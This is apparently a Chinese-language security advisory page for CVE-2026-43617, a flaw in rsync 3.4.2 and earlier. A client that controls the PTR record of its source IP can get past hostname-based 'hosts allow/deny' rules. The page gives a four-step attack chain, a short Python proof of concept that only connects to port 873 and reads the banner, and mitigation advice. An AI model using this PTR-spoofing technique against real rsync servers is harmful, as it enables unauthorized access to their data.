CVE-2026-43617 CVSS 4.8 中危

CVE-2026-43617 Rsync授权绕过漏洞

披露日期: 2026-05-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-43617

漏洞类型

授权绕过

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Rsync

漏洞概述

Rsync版本3.4.2及之前版本存在授权绕过漏洞。该漏洞源于rsync守护进程在配置chroot时，对基于主机名的访问控制列表（ACL）强制执行逻辑存在缺陷。攻击者可通过控制源IP的PTR记录，绕过管理员设置的基于主机名的拒绝规则，从而从本应被拒绝的主机名建立连接，导致未授权访问。

技术细节

该漏洞发生在rsync守护进程处理反向DNS解析及主机名ACL验证的过程中。当rsync配置了chroot环境并使用“hosts allow”或“hosts deny”进行访问控制时，系统会根据客户端IP的反向DNS解析结果（PTR记录）来验证主机身份。由于验证逻辑存在缺陷，攻击者如果能够控制其源IP地址对应的PTR记录，便可以伪造一个被允许的主机名。此外，在某些反向DNS解析失败的默认处理场景下，也可能绕过原本的拒绝规则。这导致攻击者能够绕过基于主机名的访问限制，连接到rsync服务并获取敏感信息或进行未授权操作。

攻击链分析

STEP 1

信息收集

攻击者识别目标Rsync服务器，确认其使用基于主机名的ACL控制且版本在3.4.2及以下。

STEP 2

环境准备

攻击者控制一个源IP地址，并配置该IP的PTR记录（反向DNS），使其解析为一个被目标rsync服务器允许的主机名。

STEP 3

发起连接

攻击者从配置好PTR记录的源IP向目标Rsync服务发起TCP连接请求。

STEP 4

绕过验证

Rsync服务进行反向DNS查询，发现PTR记录对应允许的主机名，从而误判连接来源合法，允许建立连接。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# Proof of Concept for CVE-2026-43617
# This script demonstrates the connection attempt assuming the attacker controls the PTR record of the source IP.
# Requirement: The attacker's IP address must resolve to a hostname allowed by the rsync "hosts allow" directive.

TARGET_HOST = "192.168.1.10" # Replace with target IP
TARGET_PORT = 873

def attempt_rsync_connection():
    try:
        print(f"[+] Attempting to connect to {TARGET_HOST}:{TARGET_PORT}...")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(10)
        s.connect((TARGET_HOST, TARGET_PORT))
        
        # Receive the server banner
        banner = s.recv(1024).decode()
        print(f"[+] Server Banner: {banner.strip()}")
        
        # If connected, the ACL bypass based on hostname (PTR) was successful
        print("[+] Connection established. ACL bypass potentially successful.")
        
        s.close()
    except Exception as e:
        print(f"[-] Connection failed: {e}")

if __name__ == "__main__":
    print("[*] CVE-2026-43617 PoC: Rsync Authorization Bypass via Hostname Resolution")
    print("[*] Ensure your reverse DNS (PTR) points to an allowed hostname.")
    attempt_rsync_connection()

影响范围

Rsync <= 3.4.2

防御指南

临时缓解措施

建议用户立即升级到Rsync 3.4.3或更高版本以修复此漏洞。如果无法立即升级，应检查并修改rsyncd.conf配置，确保不单纯依赖反向DNS解析进行主机验证，改为使用严格的IP地址访问控制列表，并限制对rsync端口的网络访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表